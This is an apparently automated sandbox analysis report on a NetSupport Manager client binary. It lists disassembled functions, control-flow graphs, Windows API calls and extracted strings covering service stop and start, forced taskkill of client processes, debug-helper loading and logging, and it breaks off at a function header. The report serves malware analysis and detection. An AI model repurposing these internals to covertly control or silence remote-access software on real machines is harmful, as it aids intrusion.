56112->56107 56112->56113 56113->56091 56117 b29c0f 56114->56117 56118 b29bec Sleep QueryServiceStatus 56114->56118 56119 b2f030 208 API calls 56115->56119 56116 b29793 56120 b2f030 208 API calls 56116->56120 56117->56115 56121 b29ce0 56117->56121 56118->56114 56118->56115 56122 b29c22 56119->56122 56123 b297a0 56120->56123 56121->56088 56220 ae95b0 12 API calls 56122->56220 56125 b299d7 56123->56125 56127 b16e30 149 API calls 56123->56127 56128 b16e30 149 API calls 56125->56128 56126 b29c34 56126->56077 56131 b29c46 RegisterEventSourceW 56126->56131 56130 b297b0 56127->56130 56129 b299dc 56128->56129 56215 ae3c80 210 API calls 2 library calls 56129->56215 56206 ae3c80 210 API calls 2 library calls 56130->56206 56131->56077 56133 b29c5d GetComputerNameW 56131->56133 56136 b29c85 56133->56136 56137 b29c8a wsprintfW ReportEventW DeregisterEventSource 56133->56137 56135 b299f6 56216 ae3b70 236 API calls 56135->56216 56136->56137 56137->56077 56138 b297ca 56207 ae3b70 236 API calls 56138->56207 56141 b29a0e 56143 b2f030 208 API calls 56141->56143 56142 b297e2 56144 b2f030 208 API calls 56142->56144 56145 b29a19 56143->56145 56146 b297ef 56144->56146 56217 ae3b70 236 API calls 56145->56217 56148 b299c2 56146->56148 56150 b16e30 149 API calls 56146->56150 56214 ae3da0 70 API calls 2 library calls 56148->56214 56149 b29a30 56152 b2f030 208 API calls 56149->56152 56153 b297ff 56150->56153 56154 b29a3b ControlService 56152->56154 56208 ae3c80 210 API calls 2 library calls 56153->56208 56155 b29a52 QueryServiceStatus 56154->56155 56156 b29ac5 GetLastError 56154->56156 56160 b29a69 56155->56160 56161 b29a96 56155->56161 56159 b2f030 208 API calls 56156->56159 56158 b29819 56209 ae3b70 236 API calls 56158->56209 56164 b29ad6 Sleep 56159->56164 56165 b29a75 Sleep QueryServiceStatus 56160->56165 56166 b29a98 56160->56166 56163 b2f030 208 API calls 56161->56163 56168 b29aa7 56163->56168 56164->56168 56165->56160 56165->56161 56166->56161 56169 b29ab6 56166->56169 56167 b29831 56170 b2f030 208 API calls 56167->56170 56218 ae3da0 70 API calls 2 library calls 56168->56218 56173 b2f030 208 API calls 56169->56173 56172 b2983e 56170->56172 56175 b299b0 56172->56175 56178 b097d0 std::locale::facet::_Facet_Register 188 API calls 56172->56178 56173->56168 56174 b29af3 56219 ae3da0 70 API calls 2 library calls 56174->56219 56213 ae3da0 70 API calls 2 library calls 56175->56213 56177 b29b05 56177->56072 56180 b29853 56178->56180 56181 b29870 56180->56181 56210 afcf10 21 API calls 56180->56210 56211 afd710 236 API calls 56181->56211 56184 b2988a 56185 b2f030 208 API calls 56184->56185 56186 b29897 56185->56186 56188 b298a5 ctype 56186->56188 56212 afc620 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 56186->56212 56188->56175 56189 afff40 std::locale::facet::_Facet_Register 9 API calls 56188->56189 56190 b298bb _memset 56189->56190 56190->56175 56191 b298d2 GetSystemDirectoryW 56190->56191 56192 b16e30 149 API calls 56191->56192 56193 b298f6 56192->56193 56194 b2f030 208 API calls 56193->56194 56195 b29949 CreateProcessW 56194->56195 56195->56175 56196 b2997c WaitForSingleObject CloseHandle CloseHandle 56195->56196 56197 b2f030 208 API calls 56196->56197 56197->56175 56199 b16e30 149 API calls 56198->56199 56200 b26705 OpenServiceW GetLastError 56199->56200 56200->56061 56202 b2a5b0 149 API calls 56201->56202 56203 b16e3d 56202->56203 56204 ae3c80 210 API calls 2 library calls 56203->56204 56204->56106 56205->56116 56206->56138 56207->56142 56208->56158 56209->56167 56210->56181 56211->56184 56213->56148 56214->56125 56215->56135 56216->56141 56217->56149 56218->56174 56219->56177 56220->56126 56221->56108

                                                                                                                        Executed Functions

                                                                                                                        Function 00B29630 Relevance: 149.3, APIs: 34, Strings: 51, Instructions: 547processservicesynchronizationCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 b29630-b2968d OpenSCManagerW 1 b296a2 0->1 2 b2968f-b29692 0->2 3 b296a7-b296ce call b2f030 GetLastError call b2f030 1->3 4 b29694-b29699 2->4 5 b2969b-b296a0 2->5 10 b29df4-b29e1c call b2f030 call b382b3 3->10 11 b296d4-b296f8 call b26700 OpenServiceW GetLastError call b2f030 3->11 4->3 5->3 20 b29d2e-b29d54 call b2f030 CloseServiceHandle Sleep 11->20 21 b296fe-b29727 QueryServiceStatus call b2f030 11->21 20->10 26 b29d5a-b29d5c 20->26 27 b29732-b29746 call b2f030 21->27 28 b29729-b2972c 21->28 26->10 30 b29d62-b29d8a call b2f030 GetSystemDirectoryW 26->30 36 b29b07-b29b1b call b2f030 27->36 37 b2974c-b29765 call b2f030 call b16e30 27->37 28->27 31 b29b1e-b29b24 28->31 44 b29d90-b29d9a 30->44 33 b29b26-b29b29 31->33 34 b29b2f-b29b3f call b2f030 31->34 33->34 38 b29d14-b29d28 call b2f030 CloseServiceHandle 33->38 49 b29b41-b29b52 QueryServiceStatus 34->49 50 b29b96-b29b9d 34->50 36->31 66 b29767 37->66 67 b2976c-b297a5 call ae3c80 call ae3b70 call b2f030 37->67 38->20 44->44 51 b29d9c-b29dbd 44->51 52 b29ba3-b29bbd call b2f030 StartServiceW 49->52 55 b29b54-b29b6a call b2f030 49->55 50->52 53 b29cfd-b29d07 50->53 56 b29dd2 51->56 57 b29dbf-b29dc2 51->57 72 b29bc3-b29be5 call b2f030 QueryServiceStatus 52->72 73 b29ce7-b29cfb GetLastError call b2f030 52->73 60 b29d0c-b29d11 call b2f030 53->60 55->52 76 b29b6c 55->76 64 b29dd7-b29df1 call b26700 call b3cda8 56->64 62 b29dc4-b29dc9 57->62 63 b29dcb-b29dd0 57->63 60->38 62->64 63->64 64->10 66->67 100 b299d7-b299e3 call b16e30 67->100 101 b297ab-b297b7 call b16e30 67->101 88 b29be7-b29bea 72->88 89 b29c18-b29c36 call b2f030 call ae95b0 72->89 73->38 81 b29b70-b29b73 76->81 81->50 86 b29b75-b29b92 Sleep QueryServiceStatus 81->86 86->81 87 b29b94 86->87 87->52 91 b29c0f-b29c12 88->91 92 b29bec-b29c0b Sleep QueryServiceStatus 88->92 89->38 106 b29c3c-b29c40 89->106 91->89 96 b29ce0-b29ce5 91->96 92->88 95 b29c0d 92->95 95->89 96->60 108 b299e5 100->108 109 b299ea-b29a50 call ae3c80 call ae3b70 call b2f030 call ae3b70 call b2f030 ControlService 100->109 111 b297b9 101->111 112 b297be-b297f4 call ae3c80 call ae3b70 call b2f030 101->112 106->38 110 b29c46-b29c57 RegisterEventSourceW 106->110 108->109 139 b29a52-b29a67 QueryServiceStatus 109->139 140 b29ac5-b29ade GetLastError call b2f030 Sleep 109->140 110->38 114 b29c5d-b29c83 GetComputerNameW 110->114 111->112 129 b297fa-b29806 call b16e30 112->129 130 b299c8-b299d2 call ae3da0 112->130 117 b29c85 114->117 118 b29c8a-b29cde wsprintfW ReportEventW DeregisterEventSource 114->118 117->118 118->38 137 b29808 129->137 138 b2980d-b29843 call ae3c80 call ae3b70 call b2f030 129->138 130->100 137->138 162 b299b3-b299c2 call ae3da0 138->162 163 b29849-b29862 call b097d0 138->163 144 b29a69 139->144 145 b29a9d-b29ab4 call b2f030 139->145 154 b29ae4-b29b05 call ae3da0 * 2 140->154 149 b29a70-b29a73 144->149 145->154 150 b29a75-b29a94 Sleep QueryServiceStatus 149->150 151 b29a98-b29a9b 149->151 150->149 155 b29a96 150->155 151->145 156 b29ab6-b29ac3 call b2f030 151->156 154->31 155->145 156->154 162->130 171 b29874 163->171 172 b29864-b29872 call afcf10 163->172 174 b29876-b2989c call afd710 call b2f030 171->174 172->174 180 b298ae-b298b0 174->180 181 b2989e-b298ab call afc620 call b37376 174->181 180->162 183 b298b6-b298bd call afff40 180->183 181->180 183->162 189 b298c3-b29901 call b38cd0 GetSystemDirectoryW call b16e30 183->189 194 b29903-b2990d 189->194 195 b29920-b2992a 189->195 194->194 196 b2990f-b29919 194->196 195->195 197 b2992c-b29931 195->197 198 b29936-b2997a call b2f030 CreateProcessW 196->198 197->198 198->162 201 b2997c-b299b0 WaitForSingleObject CloseHandle * 2 call b2f030 198->201 201->162
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B2967A
                                                                                                                        • GetLastError.KERNEL32 ref: 00B296BB
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 00B296DD
                                                                                                                        • GetLastError.KERNEL32 ref: 00B296E5
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2970C
                                                                                                                        • _memset.LIBCMT ref: 00B298CD
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000208), ref: 00B298EB
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00B29972
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 00B29988
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastOpenService$CreateDirectoryManagerObjectProcessQuerySingleStatusSystemWait_memset
                                                                                                                        • String ID: AllowStop (admin) ret %x$AllowStop (direct vista) ret %x$AllowStop (service vista) ret %x$AllowStop (service) ret %x$AllowStop ret %x$Attempt to start the service$Attempt to stop the service$CICWClass$Calling %s$Client32 (%s)$ControlService failed with %d$D$Global\CICWClass$Global\CICWClassAdmin$Global\CICWClassVista$Global\NSMWClass$Global\NSMWClassAdmin$Global\NSMWClassVista$NSMWClass$NSMWClassVista$PCIapp$RESTART$Restarted client32 service after %s$START$STOP$Service Manager : %08x - %d$Service State : %d$Service failed to start after 60 seconds$Service failed to stop after 60 seconds$Service is running$Service is stopped$Service isn't in Stopped state$Service isn't running$Service started ok$Service stopped ok$StartService failed with %d$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM cicStudent.exe /IM cicplugin.exe /IM cicplugin64.exe$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$hClient %08x - %d$restart$start$stop
                                                                                                                        • API String ID: 3819898530-63559561
                                                                                                                        • Opcode ID: 2865675dbbbe83f4be84873337d1274c986d581d12a35db96bd80b3b2494226d
                                                                                                                        • Instruction ID: a81a08dce24e80357038da9a83385cd68f15b6b0d3638e00171fafad51e2d76c
                                                                                                                        • Opcode Fuzzy Hash: 2865675dbbbe83f4be84873337d1274c986d581d12a35db96bd80b3b2494226d
                                                                                                                        • Instruction Fuzzy Hash: 2B12D871D41325ABEB20AB54AC46FAA72F8EB40B54F0440E4F90DA72C2DB709F45CB66
                                                                                                                        Function 00B14760 Relevance: 70.1, APIs: 21, Strings: 19, Instructions: 140libraryloaderCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 680 b14760-b1479e GetModuleFileNameW 681 b147a0-b147b3 call b384df 680->681 682 b147dd-b147e1 680->682 681->682 690 b147b5-b147bf 681->690 684 b147e3-b147f0 LoadLibraryW 682->684 685 b147fd-b1481b GetModuleHandleW GetProcAddress 682->685 684->685 687 b147f2-b147fa LoadLibraryW 684->687 688 b1482b-b14854 GetProcAddress * 4 685->688 689 b1481d-b14829 685->689 687->685 691 b14857-b148da GetProcAddress * 11 call b382b3 688->691 689->691 692 b147c0-b147cd 690->692 695 b148df-b148e2 691->695 692->692 694 b147cf-b147da LoadLibraryW 692->694 694->682
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00B14790
                                                                                                                        • LoadLibraryW.KERNELBASE(?,?), ref: 00B147D8
                                                                                                                        • LoadLibraryW.KERNELBASE(DBGHELP.DLL,?,?), ref: 00B147E9
                                                                                                                        • LoadLibraryW.KERNEL32(IMAGEHLP.DLL,?,?), ref: 00B147F8
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00B147FE
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 00B14812
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 00B14831
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 00B1483C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 00B14847
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 00B14852
                                                                                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 00B1485D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 00B14868
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 00B14873
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 00B1487E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymRefreshModuleList), ref: 00B14889
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 00B14894
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 00B1489F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 00B148AA
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 00B148B5
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 00B148C0
                                                                                                                        • GetProcAddress.KERNELBASE(00000000,MiniDumpWriteDump), ref: 00B148CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName
                                                                                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymRefreshModuleList$SymSetOptions$dbghelp.dll
                                                                                                                        • API String ID: 1621119295-2166784381
                                                                                                                        • Opcode ID: b8f6d54e766f2947e8f639f472c92e15081e1727dfc875c8e39baeb85367f3fe
                                                                                                                        • Instruction ID: 493ac02c0661ed372f8b092c49eb2c312b076a3cdf94ed5fbe9bfe261159a594
                                                                                                                        • Opcode Fuzzy Hash: b8f6d54e766f2947e8f639f472c92e15081e1727dfc875c8e39baeb85367f3fe
                                                                                                                        • Instruction Fuzzy Hash: 99416070900705AFD7209F769C8593BFAF8FF95B0470009BEE446D36A1EBB8EC018A58
                                                                                                                        Function 00B2F030 Relevance: 56.4, APIs: 20, Strings: 12, Instructions: 387keyboardtimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 696 b2f030-b2f0ab GetLocalTime wsprintfW 697 b2f0b1-b2f0db wvsprintfW wsprintfW 696->697 698 b2f199-b2f19f 696->698 697->698 699 b2f0e1-b2f0e7 697->699 700 b2f1a1-b2f1ac InitializeCriticalSection 698->700 701 b2f1b6-b2f1c8 EnterCriticalSection 698->701 699->698 702 b2f0ed-b2f0f5 699->702 700->701 703 b2f1ca-b2f1cc 701->703 704 b2f1e9-b2f201 GetCurrentDirectoryW 701->704 707 b2f0f7-b2f0fc call b37ca4 702->707 708 b2f124-b2f129 702->708 705 b2f1d0-b2f1e5 703->705 706 b2f204-b2f20e 704->706 705->705 709 b2f1e7 705->709 706->706 711 b2f210-b2f21f 706->711 713 b2f101-b2f10b 707->713 710 b2f130-b2f139 708->710 714 b2f247-b2f25a call b384df 709->714 710->710 715 b2f13b-b2f14a 710->715 711->714 716 b2f221-b2f223 711->716 717 b2f111-b2f11e 713->717 718 b2f599-b2f5a9 call b382b3 713->718 727 b2f423-b2f43e LeaveCriticalSection call b382b3 714->727 728 b2f260-b2f26e 714->728 719 b2f150-b2f159 715->719 720 b2f230-b2f245 716->720 717->708 717->718 719->719 723 b2f15b-b2f168 719->723 720->714 720->720 723->718 726 b2f16e-b2f174 723->726 730 b2f177-b2f186 726->730 731 b2f270-b2f27d 728->731 730->730 733 b2f188-b2f198 call b382b3 730->733 731->731 734 b2f27f-b2f282 731->734 736 b2f288-b2f28e 734->736 737 b2f43f-b2f44b 734->737 736->727 741 b2f294-b2f2aa call b39583 736->741 738 b2f452-b2f466 call b39583 737->738 739 b2f44d 737->739 738->727 748 b2f468-b2f499 call b034a0 738->748 739->738 746 b2f2b0-b2f2cf call ae1f50 call ae19e0 741->746 747 b2f335-b2f342 GetKeyState 741->747 770 b2f2d1-b2f2e9 call b3a397 746->770 771 b2f31d-b2f322 746->771 750 b2f357-b2f365 747->750 751 b2f344-b2f34b GetKeyState 747->751 757 b2f49b-b2f4ac call b373d1 748->757 758 b2f4af-b2f4b5 748->758 755 b2f370-b2f377 750->755 751->750 754 b2f34d 751->754 754->750 755->727 760 b2f37d-b2f38e 755->760 757->758 762 b2f513-b2f532 call b19130 758->762 763 b2f4b7-b2f4d9 call b19130 758->763 765 b2f390 760->765 766 b2f395-b2f3cf wsprintfW RegOpenKeyExW 760->766 782 b2f535-b2f53a 762->782 785 b2f4e0-b2f4e5 763->785 765->766 772 b2f3d1-b2f3f9 RegQueryValueExW 766->772 773 b2f419-b2f41d 766->773 791 b2f2f4-b2f30a call b3b0ad 770->791 792 b2f2eb-b2f2f2 770->792 777 b2f324-b2f32a call b38c09 771->777 778 b2f32d-b2f330 call b01dc0 771->778 774 b2f3fb-b2f407 call b38406 772->774 775 b2f40c-b2f413 RegCloseKey 772->775 773->727 773->755 774->775 775->773 777->778 778->747 782->782 788 b2f53c-b2f552 call b3762e 782->788 785->785 790 b2f4e7-b2f510 call b3762e call b379a7 call b37376 785->790 802 b2f561-b2f583 LeaveCriticalSection call b37376 788->802 803 b2f554-b2f55b OutputDebugStringW 788->803 790->762 791->771 805 b2f30c-b2f30f 791->805 795 b2f310-b2f31a call b38406 792->795 795->771 810 b2f585-b2f58b call b38c09 802->810 811 b2f58e-b2f594 call b01dc0 802->811 803->802 805->795 810->811 811->718
                                                                                                                        APIs
                                                                                                                        • GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                        • wsprintfW.USER32 ref: 00B2F09D
                                                                                                                        • wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                        • wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                        • _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00B37CA4: __FF_MSGBANNER.LIBCMT ref: 00B37CBD
                                                                                                                          • Part of subcall function 00B37CA4: __NMSG_WRITE.LIBCMT ref: 00B37CC4
                                                                                                                          • Part of subcall function 00B37CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,75BF73E0,?,00B097EE,00000000,?,?), ref: 00B37CE9
                                                                                                                        • InitializeCriticalSection.KERNEL32(00B9250C), ref: 00B2F1A6
                                                                                                                        • EnterCriticalSection.KERNEL32(00B9250C), ref: 00B2F1BB
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B2F1F5
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B2F2DF
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B2F33D
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00B2F346
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSectionStatewsprintf$AllocateCurrentDirectoryEnterHeapInitializeLocalTime__wcsnicmp_mallocwvsprintf
                                                                                                                        • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d $@$C:\Windows\Installer\$C:\Windows\Installer\$Log$Log=$SOFTWARE\Productive Computer Insight\%s$a+t$a+tc$winst32$winst32.log$winstall
                                                                                                                        • API String ID: 146506923-2290212741
                                                                                                                        • Opcode ID: 4f2c363d05514b4b2e1ec2802fd01808b7dd721d6cf7c582b34eeab5b83ccebe
                                                                                                                        • Instruction ID: 1ea587d02cdb87501f1483912687b4b8e0f20018cae32eabddf537df7d70c8f8
                                                                                                                        • Opcode Fuzzy Hash: 4f2c363d05514b4b2e1ec2802fd01808b7dd721d6cf7c582b34eeab5b83ccebe
                                                                                                                        • Instruction Fuzzy Hash: A3E106B1900216ABCB20EF64EC91BFA73F4EB54304F4441F9F90DA7291EBB45A84CB91
                                                                                                                        Function 00B2DDD0 Relevance: 56.3, APIs: 14, Strings: 18, Instructions: 306COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 816 b2ddd0-b2de38 SetUnhandledExceptionFilter GetModuleFileNameW 817 b2de40-b2de52 call b26080 816->817 818 b2de3a GetLastError 816->818 821 b2ef04-b2ef19 call b382b3 817->821 822 b2de58-b2dee0 call b2f030 * 2 GetUserNameW call afff40 call b2f030 call b25490 call b04690 call ae9c30 call b39cae call b3b0ad 817->822 818->817 843 b2dee2-b2def7 call b3b0ad 822->843 844 b2def9-b2df08 822->844 843->844 846 b2df0c-b2dfa0 call b2f030 LoadStringW call b2a5b0 wsprintfW call b2a5b0 * 3 call b39116 843->846 844->846 862 b2dfa2-b2dfb6 846->862 862->862 863 b2dfb8-b2dfcc 862->863 864 b2dfd0-b2dfe4 863->864 864->864 865 b2dfe6-b2dffa 864->865 866 b2e000-b2e014 865->866 866->866 867 b2e016-b2e037 call b3ab18 866->867 870 b2e040-b2e054 867->870 870->870 871 b2e056-b2e085 call b3ab18 call b2f6d0 870->871 876 b2e087-b2e0d1 GetPrivateProfileStringW lstrcmpiW 871->876 877 b2e0dd-b2e0f4 GetModuleFileNameW 871->877 876->877 878 b2e0d3 876->878 879 b2e0f6 GetLastError 877->879 880 b2e0fc-b2e12e call b2f030 * 2 call b26080 877->880 878->877 879->880 880->821 887 b2e134-b2e13f 880->887 888 b2e141-b2e14e 887->888 888->888 889 b2e150-b2e16f call b3d09c 888->889 892 b2e170-b2e17a 889->892 892->892 893 b2e17c-b2e184 call b2b1f0 892->893 895 b2e189-b2e191 893->895 896 b2e193 895->896 897 b2e198-b2e19a 895->897 896->897 898 b2e1a0-b2e1a9 897->898 898->898 899 b2e1ab-b2e1b2 898->899 900 b2e1b5-b2e1bf 899->900 900->900 901 b2e1c1-b2e1ee 900->901 902 b2e1f0-b2e1ff call b383b0 901->902 905 b2e210 902->905 906 b2e201-b2e207 902->906 907 b2e213-b2e220 call b383b0 905->907 906->907 908 b2e209-b2e20e 906->908 911 b2e222-b2e228 907->911 912 b2e231 907->912 908->905 908->907 913 b2e234-b2e238 911->913 914 b2e22a-b2e22f 911->914 912->913 915 b2e23a 913->915 916 b2e23c-b2e23f 913->916 914->912 914->913 915->916 917 b2e663-b2e669 916->917 918 b2e245-b2e2b1 call b3a558 916->918 919 b2e66f-b2e676 917->919 920 b2edbd-b2edd1 call b2f030 917->920 946 b2e2b7-b2e2c1 918->946 947 b2e84d-b2e869 Sleep call b24420 918->947 922 b2e688-b2e68d 919->922 923 b2e678-b2e682 GetCurrentDirectoryW 919->923 930 b2edd3-b2ede1 PostMessageW 920->930 931 b2ede7-b2edfc DestroyWindow 920->931 926 b2e690-b2e699 922->926 923->922 926->926 929 b2e69b-b2e6af 926->929 932 b2e6b1-b2e6b9 929->932 933 b2e6bc-b2e6ec call b278f0 call b2f030 929->933 930->931 935 b2ee02-b2ee0f 931->935 936 b2ef27-b2ef37 call b382b3 931->936 932->933 933->920 952 b2e6f2-b2e70e call b24050 933->952 938 b2ee10-b2ee1d 935->938 938->938 941 b2ee1f-b2ee35 call b39583 938->941 953 b2ee37-b2ee48 call b373d1 call b38c09 941->953 954 b2ee4b-b2ee51 941->954 946->902 947->920 952->920 953->954 955 b2ee53-b2ee6e Sleep call b2f030 call b24420 954->955 956 b2ee71-b2ee90 call b2f030 call b382b3 954->956 955->956
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0003A490,00000000,00000000,00000000), ref: 00B2DE15
                                                                                                                        • GetModuleFileNameW.KERNEL32(00AE0000,?,00000100), ref: 00B2DE34
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2DE3A
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000050), ref: 00B2DE89
                                                                                                                        • __wcsdup.LIBCMT ref: 00B2DEC6
                                                                                                                        • LoadStringW.USER32(?,000003E8,?,00000100), ref: 00B2DF37
                                                                                                                        • wsprintfW.USER32 ref: 00B2DF51
                                                                                                                        • __wcsicoll.LIBCMT ref: 00B2DF81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Name$ErrorExceptionFileFilterLastLoadModuleStringUnhandledUser__wcsdup__wcsicollwsprintf
                                                                                                                        • String ID: $/EC$/ec$Command Line: %s$NSM$NetSupport Manager for Windows (32 bit) V14.10$P$PCD$Start, session=%d, user=%s$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                                                        • API String ID: 4293451977-2907401125
                                                                                                                        • Opcode ID: 277d5430cb6cbbaa965476c617cf3350cba1a4b202846fd498d9eeee75d27578
                                                                                                                        • Instruction ID: 7d037855b65fd186393a39df6943f04cc8e542553c78eda3d82c4f0eb00827e3
                                                                                                                        • Opcode Fuzzy Hash: 277d5430cb6cbbaa965476c617cf3350cba1a4b202846fd498d9eeee75d27578
                                                                                                                        • Instruction Fuzzy Hash: 6EB115B19403129FCB20BF69ED46A6A73F4FB14700F1585E5F52D972A1EFB09980CB62
                                                                                                                        Function 00B1A250 Relevance: 43.9, APIs: 21, Strings: 4, Instructions: 172threadmemoryCOMMON
